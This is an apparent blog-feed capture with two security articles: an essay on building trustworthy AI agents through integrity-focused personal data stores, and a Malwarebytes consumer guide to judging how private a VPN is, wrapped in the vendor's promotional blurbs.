If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Building Trustworthy AI Agents

12 December 2025 at 07:00

The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions.

These aren’t edge cases. They’re the result of building AI systems without basic integrity controls. We’re in the third leg of data security—the old CIA triad. We’re good at availability and working on confidentiality, but we’ve never properly solved integrity. Now AI personalization has exposed the gap by accelerating the harms.

The scope of the problem is large. A good AI assistant will need to be trained on everything we do and will need access to our most intimate personal interactions. This means an intimacy greater than your relationship with your email provider, your social media account, your cloud storage, or your phone. It requires an AI system that is both discreet and trustworthy when provided with that data. The system needs to be accurate and complete, but it also needs to be able to keep data private: to selectively disclose pieces of it when required, and to keep it secret otherwise. No current AI system is even close to meeting this.

To further development along these lines, I and others have proposed separating users’ personal data stores from the AI systems that will use them. It makes sense; the engineering expertise that designs and develops AI systems is completely orthogonal to the security expertise that ensures the confidentiality and integrity of data. And by separating them, advances in security can proceed independently from advances in AI.

What would this sort of personal data store look like? Confidentiality without integrity gives you access to wrong data. Availability without integrity gives you reliable access to corrupted data. Integrity enables the other two to be meaningful. Here are six requirements. They emerge from treating integrity as the organizing principle of security to make AI trustworthy.

First, it would be broadly accessible as a data repository. We each want this data to include personal data about ourselves, as well as transaction data from our interactions. It would include data we create when interacting with others—emails, texts, social media posts—and revealed preference data as inferred by other systems. Some of it would be raw data, and some of it would be processed data: revealed preferences, conclusions inferred by other systems, maybe even raw weights in a personal LLM.

Second, it would be broadly accessible as a source of data. This data would need to be made accessible to different LLM systems. This can’t be tied to a single AI model. Our AI future will include many different models—some of them chosen by us for particular tasks, and some thrust upon us by others. We would want the ability for any of those models to use our data.

Third, it would need to be able to prove the accuracy of data. Imagine one of these systems being used to negotiate a bank loan, or participate in a first-round job interview with an AI recruiter. In these instances, the other party will want both relevant data and some sort of proof that the data are complete and accurate.

Fourth, it would be under the user’s fine-grained control and audit. This is a deeply detailed personal dossier, and the user would need to have the final say in who could access it, what portions they could access, and under what circumstances. Users would need to be able to grant and revoke this access quickly and easily, and be able to go back in time and see who has accessed it.

Fifth, it would be secure. The attacks against this system are numerous. There are the obvious read attacks, where an adversary attempts to learn a person’s data. And there are also write attacks, where adversaries add to or change a user’s data. Defending against both is critical; this all implies a complex and robust authentication system.

Sixth, and finally, it must be easy to use. If we’re envisioning digital personal assistants for everybody, it can’t require specialized security training to use properly.

I’m not the first to suggest something like this. Researchers have proposed a “Human Context Protocol” (https://papers.ssrn.com/sol3/ papers.cfm?abstract_id=5403981) that would serve as a neutral interface for personal data of this type. And in my capacity at a company called Inrupt, Inc., I have been working on an extension of Tim Berners-Lee’s Solid protocol for distributed data ownership.

The engineering expertise to build AI systems is orthogonal to the security expertise needed to protect personal data. AI companies optimize for model performance, but data security requires cryptographic verification, access control, and auditable systems. Separating the two makes sense; you can’t ignore one or the other.

Fortunately, decoupling personal data stores from AI systems means security can advance independently from performance (https:// ieeexplore.ieee.org/document/ 10352412). When you own and control your data store with high integrity, AI can’t easily manipulate you because you see what data it’s using and can correct it. It can’t easily gaslight you because you control the authoritative record of your context. And you determine which historical data are relevant or obsolete. Making this all work is a challenge, but it’s the only way we can have trustworthy AI assistants.

This essay was originally published in IEEE Security & Privacy.

How private is your VPN?

12 December 2025 at 05:25

When you’re shopping around for a Virtual Private Network (VPN) you’ll find yourself in a sea of promises like “military-grade encryption!” and “total anonymity!” You can’t scroll two inches without someone waving around these fancy terms.

But not all VPNs can be trusted. Some VPNs genuinely protect your privacy, and some only sound like they do.

With VPN usage rising around the world for streaming, travel, remote work, and basic digital safety, understanding what makes a VPN truly private matters more than ever.

After years of trying VPNs for myself, privacy-minded family members, and a few mission-critical projects, here’s what I wish everyone knew.

Why do you even need a VPN?

If you’re wondering whether a VPN is worth it, you’re not alone. As your privacy-conscious consumer advocate, let me break down three time-saving and cost-saving benefits of using a privacy-first VPN.

Keep your browsing private

Ever feel like someone’s always looking over your shoulder online? Without a VPN, your internet service provider, and sometimes websites or governments, can keep tabs on what you do. A VPN encrypts your traffic and swaps out your real IP address for one of its own, letting you browse, shop, and read without a digital paper trail following you around.

I’ve run into this myself while traveling. There were times when I needed a VPN just to access US or European web apps that were blocked in certain Asian countries. In other cases, I preferred to appear “based” in the US so that English-language apps would load naturally, instead of defaulting to the local language, currency, or content of the country I was visiting.

Watch what you want, but pay less

Some of your favorite shows and websites are locked away simply because of where you live. In many cases, subscription or pay-per-view prices are higher in more prosperous regions. With a VPN, you can connect to servers in other countries and unlock content that isn’t available at home.

For example, when All Elite Wrestling (AEW) announced its major 2022 pay-per-view featuring CM Punk vs. Jon Moxley, US fans paid $49.99 through Bleacher Report. Fans in the UK, meanwhile, watched the exact same event on FiteTV for $23 less, around half the price. Because platforms determine pricing based on your IP address, a VPN server in another region can show you the pricing available in that country. Savings like that can make a VPN pay for itself quickly.

Stay safe on coffee-shop Wi-Fi

Before you join a network named “Starbucks Guest WiFi,” remember that nothing stops a cybercriminal from broadcasting a hotspot with the same name. Public Wi-Fi is convenient, but it’s also one of the easiest places for someone to snoop on your traffic.

Connecting to your VPN immediately encrypts everything you send or receive. That means you can check email, pay bills, or browse privately without worrying about someone nearby intercepting your information. Getting compromised will cost far more in money, time, and stress than most privacy-first VPN subscriptions.

But what actually makes a VPN privacy-first?

For a VPN, “privacy-first” can’t be just a nice slogan. It’s a mindset that shapes every technical, business, and legal decision.

A privacy-first VPN:

  • Collects as little data as possible — only the minimum needed to run the service.
  • Enforces a real no-logs policy through design, not marketing.
  • Builds privacy into everything, from software to server operations.
  • Practices transparency, often through open-source components and independent audits.

If a VPN can’t explain how it handles these areas, that’s a red flag.

What is WireGuard and why is it such a big deal?

WireGuard isn’t a VPN service. It’s the protocol that powers many modern VPNs, including Malwarebytes Privacy VPN. It’s the engine that handles encryption and securely routes your traffic.

WireGuard is the superstar in the VPN world. Unlike clunkier, older protocols (like OpenVPN or IPSec) it’s deliberately lean and built for the modern internet. Its small codebase is easier to audit and leaves fewer places for bugs to hide. It’s fully open-source, so researchers can dig into exactly how it works.

Its cryptography is fast, efficient, and modern with strong encryption, solid key exchange, and lightweight hashing that reduces overhead. In practice, that means better privacy and better performance without a provider having to gather connection data just to keep speeds usable.

Of course, WireGuard is just the foundation. Each VPN implements it differently. The better ones add privacy-friendly tweaks like rotating IP addresses or avoiding static identifiers so that even they can’t link sessions back to individual users.

How to compare VPNs

With VPN usage rising, especially where new age-verification rules have sparked debate about whether VPNs might face future scrutiny, it’s more important than ever to choose providers with strong, transparent privacy practices.

When you boil it down, a handful of questions reveal almost everything about how a VPN treats your privacy:

  • Who controls the infrastructure?
  • Are the servers RAM-only?
  • Which protocol is used, and how is it implemented?
  • What laws apply to the company?
  • Have experts audited the service?
  • Do transparency reports or warrant canaries exist and stay updated?
  • Can you sign up and pay without giving away your entire identity?

If a VPN provider gets evasive about any of this, or runs its service “for free” while collecting data to make the numbers work, that tells you almost everything you need to know.

Why infrastructure ownership matters

One of the most revealing questions you can ask is deceptively simple: Who actually owns the servers?

Most VPNs rent hardware from large data centers or cloud platforms. When they do, your traffic travels through machines managed not only by the VPN’s engineers, but also by whoever runs those facilities. That introduces an access question: Who else has their hands on the hardware?

When a VPN owns and operates its equipment, including racks and networking gear, it reduces the number of unknowns dramatically. The fewer third parties in the chain, the easier it is to stand behind privacy guarantees.

RAM-only (diskless) servers: the gold standard

RAM-only servers take this a step further. Because everything runs in memory, nothing is ever written to a hard drive. Pull the plug and the entire working state disappears instantly, like wiping a whiteboard clean. That means no logs sitting quietly on a disk, nothing for an intruder or authorities to seize, and nothing left behind if ownership, personnel, or legal circumstances change.

This setup also tends to go hand-in-hand with owning the hardware. Most public cloud environments simply don’t allow true diskless deployments with full control over the underlying machine.

Other privacy features to watch for

Even with strong infrastructure and protocols, the details still matter. A solid kill switch keeps your traffic from leaking if the connection drops. Private DNS prevents queries from being routed through third parties. Multi-hop routes make correlation attacks harder. And torrent users may want carefully implemented port forwarding that doesn’t introduce side channels.

These aren’t flashy features, but they show whether a provider has considered the full privacy landscape, not just the obvious parts.

Audits and transparency reports

A provider that truly stands behind its privacy claims will welcome outside inspection. Independent audits, published findings, and ongoing transparency reports help confirm whether logging is disabled in practice, not just in principle. Some companies also maintain warrant canaries (more on this below). None of these are perfect, but together they paint a clear picture of how seriously the VPN treats user trust.

A warrant canary in the VPN coalmine

Okay, so here’s something interesting: some companies use something called a “warrant canary” to quietly let us know if they’ve received a top-secret government request for data. Here’s the deal…it’s illegal for them to simply tell us, “Hey, the government’s snooping around.” So, instead, they publish a simple statement that says something like, “As of January 2026, we haven’t received any secret orders for your data.”

The clever part is that they update this statement on a regular basis. If it suddenly disappears or just stops getting updated, it could mean the company got hit with one of these hush-hush requests and legally can’t talk about it. It’s like the digital version of a warning signal. It is nothing flashy, but if you’re paying attention, you’ll spot when something changes.

It’s not a perfect system (and who knows what the courts will think of it in the future), but a warrant canary is one-way companies try to be on our side, finding ways to keep us in the loop even when they’re told to stay silent. So, give an extra ounce of trust to companies that publish these regularly.

Where privacy-first VPNs are heading

Expect to see continued evolution: new cryptography built for a post-quantum world, more transparency from providers, decentralized and community-run VPN options, and tighter integration with secure messaging, encrypted DNS, and whatever comes next.

It’s also worth keeping an eye on how governments respond to rising VPN use. In the UK, for example, new age-verification rules triggered a huge spike in VPN sign-ups and a public debate about whether VPN usage should be monitored more closely. There’s no proposal to restrict or ban VPNs, but the conversation is active.

If you care about your privacy online, don’t settle for slick marketing. Look for the real foundations like modern protocols, owned and well-managed infrastructure, RAM-only servers, regular audits, and a culture that treats transparency as a habit, not a stunt.

Privacy is engineered, not simply promised. With the right VPN, you stay in control of your digital life instead of hoping someone else remembers to keep your secrets safe.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.



❌